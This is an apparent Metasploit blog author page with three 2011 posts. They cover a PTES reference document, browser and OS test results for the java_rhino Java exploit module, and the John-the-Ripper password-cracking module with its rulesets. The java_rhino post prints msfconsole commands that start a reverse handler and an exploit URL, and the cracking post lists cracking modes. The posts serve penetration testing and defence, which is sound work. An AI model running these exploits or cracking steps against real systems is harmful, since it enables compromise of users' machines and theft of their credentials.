Skip navigation
All Places > Metasploit > Blog > Authors jcran

Metasploit

3 Posts authored by: jcran
jcran

Metasploit and PTES

Posted by jcran Dec 2, 2011

One of our Metasploit contributers, Brandon Perry, has put together a document detailing the recently released Penetration Testing Execution Standard (PTES) with the modules and functionality in the Framework. PTES is a push from a group of testers fed up with the lack of guidance and the disparate sources of basic penetration testing information. Brandon's document does a great job detailing disparate parts of the framework in the context of PTES.

 

Hopefully Brandon will continue to build this document out, as it is a handy resource. This helps make the PTES guidance actionable, and is a good read whether you're just getting started or you're an old hand with the framework.

 

Have a look at the document here.

@_sinn3r and Juan Vasquez recently released a module which exploits the Java vulnerability detailed here by mihi and by Brian Krebs here. This is a big one.  To quote Krebs: "A new exploit that takes advantage of a recently-patched critical security flaw in Java is making the rounds in the criminal underground." To determine if you're running java, you can use  this link, and click “Do I have Java?”  below the big red 'Free Java Download' button."

 

We've tested the java_rhino exploit on a number of platforms, and below is a breakout of the results This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and is an easy-to-exploit client-side that does little to make the user aware they're being exploited.

 

Microsoft Windows:

 

Both Windows XP and Windows 7 were tested for vulnerability, a session was generated in every browser that was tested when the system was running java versions prior to the latest. Note that Chrome did prompt the user to let them know the java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.

 

WinXP SP3 x86 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Firefox - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

WinXP SP3 x86 / Safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 8 - SESSION CREATED with versions prior to 1.6.0_29-b11

Win7 x64 / IE 9.0.8 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Ubuntu Linux:

 

Several linux desktops were tested, one with the Sun Java plugin, and another with the Iced Tea plugin. The Iced Tea java plugin was determined to not be vulnerable, though it wasn't tested extensively, it may still be vulnerable.

 

An attempt was made to update the Ubuntu 10.04 device, and the java package was downloaded and linked to system java, however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395 .html - However, even after following these instructions, i was unable to get this process to work, and simply disabled java on the vulnerable device.

 

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin. Firefox did not, however, when i went to disable the plugin, i noticed that the 'update' button lead me to a page which indicated that Java was out of date and vulnerable. It would be ideal if it prompted the user at runtime.

 

Ubuntu 10.04 LTS x64 / Firefox (Oracle Java 1.6.0_26) SESSION CREATED - no package available in the repositories

Ubuntu 10.04 LTS x64 / Chrome (Oracle Java 1.6.0_26) - SESSION CREATED - no package available in the repositories

Ubuntu 11.10 x64 / Chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin

 

Apple OS X:

 

Interesting issue here, I was forced to update, restart, then update again to get the updated sun java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus, a second update was required to get the latest java package. To be fair, this system wasn't updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.

 

Once again, Chrome was the only browser that prompted the user that there may be a problem with the plugin.

 

OS X 10.6.6 x64 / Chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11

OS X 10.6.6 x64 / Safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11

 

Testing for the java_rhino vulnerability:

 

You can test this exploit in your own environment with the (framework) instructions below. We are currently prepping our weekly update for our commercial customers, it will be available in the Pro / Express / Community product later today.


msf  exploit(handler) > use exploit/multi/browser/java_rhino

msf  exploit(java_rhino) > info

msf  exploit(java_rhino) > set URIPATH xxxx

msf  exploit(java_rhino) > exploit

 

[*] Exploit running as background job.

[*] Started reverse handler on 10.0.0.11:4444

[*] Using URL: hxxp://0.0.0.0:8080/xxxx

[*]  Local IP: hxxp://10.0.0.11:8080/xxxx

[*] Server started.

 

Point vulnerable systems at the URL, and wait for your sessions.

HDM recently added password cracking functionality to Metasploit through the inclusion of John-the-Ripper in the Framework. The 'auxiliary/analyze/jtr_crack_fast' module was created to facilitate JtR's usage in Framework and directly into Express/Pro's automated collection routine. The module works against known Windows hashes (NTLM and LANMAN). It uses hashes in the database as input, so make sure you've run hashdump with a database connected to your Framework instance (Pro does this automatically) before running the module. The module collects the hashes in the database and passes them to the john binaries that are now (r13135) included in Framework via a generated PWDUMP-format file.

 

Several JtR modes are utilized for quick and targeted cracking. First, wordlist mode: The generated wordlist consists of the standard john wordlist with known usernames, passwords, and hostnames appended. A ruleset based on the Korelogic mutation rules is then used to generate mutations of these words. You can find the msf version of these rules here.

 

Once the initial wordlist bruting is complete, incremental bruting rules, aptly named All4 & Digits5, are used to brute force additional combinations. These rulesets are shown below and can be found in the same john.conf configuration file in the Framework.

 

Cracked values are appended to the wordlist as they're found. This is beneficial :

  1. Previously-cracked hashes are pulled from the john.pot at the start of a run and these passwords are used as seed values for subsequent runs.
  2. Mutation rules are applied to cracked passwords, possibly enabling other previously-uncracked hashes to be broken.

 

Finally, discovered username/password combinations are reported to the database and associated with the host / service.

 

Cracking modes:

--wordlist=<ourgenerated wordlist> --rules single --format=lm

--incremental=All4--format=lm

--incremental=Digits5--format=lm

--wordlist=<ourgenerated wordlist> --rules single --format=ntlm

--incremental=All4--format=ntlm

--incremental=Digits5--format=lm

 

Incremental Rulesets:

[Incremental:All4]

File = $JOHN/all.chr

MinLen = 0

MaxLen = 4

CharCount = 95

 

[Incremental:Digits5]

File =$JOHN/digits.chr

MinLen = 1

MaxLen = 5

CharCount = 10

 

As with everything in the framework, it's subject to patches and improvement, so make sure to check the code. Thanks to mubix for several edits. This info is current as of July 27, 2011.

 

UPDATE: Check out KoreLogic's upcoming Defcon 19 password cracking contest if you're interested in this stuff!

Filter Blog

By date: By tag: